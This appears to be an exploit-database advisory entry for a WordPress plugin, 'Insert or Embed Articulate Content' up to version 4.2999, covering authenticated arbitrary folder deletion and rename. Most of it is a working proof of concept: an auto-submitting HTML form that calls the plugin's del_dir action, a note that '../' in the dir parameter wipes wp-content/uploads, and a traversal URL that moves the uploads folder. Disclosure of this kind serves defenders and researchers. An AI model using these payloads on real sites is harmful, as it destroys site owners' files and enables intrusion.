Insert or Embed Articulate Content into WordPress <= 4.2999 - Authenticated Arbitrary Folder Deletion and Rename

2019-07-02T00:00:00
ID WPEX-ID:9416
Type wpexploit
Reporter WPScanTeam
Modified 2020-09-22T00:00:00

Description

WordPress Vulnerability - Insert or Embed Articulate Content into WordPress <= 4.2999 - Authenticated Arbitrary Folder Deletion and Rename

                                        
                                            &lt;html&gt;
  &lt;body onload="document.forms[0].submit()"&gt;
    &lt;form action="https://&lt;BLOG&gt;/wp-admin/admin-ajax.php" method="POST"&gt;
      &lt;input type="hidden" name="action" value="del_dir" /&gt;
      &lt;input type="hidden" name="dir" value="" /&gt;
    &lt;/form&gt;
  &lt;/body&gt;
&lt;/html&gt;

The dir parameter can be changed, for example using '../' will delete the content of wp-content/uploads.

To rename and move wp-content/uploads/articulate_uploads to wp-content/yolo:

https://&lt;BLOG&gt;/wp-admin/admin-ajax.php?action=rename_dir&dir_name=/&title=../../yolo/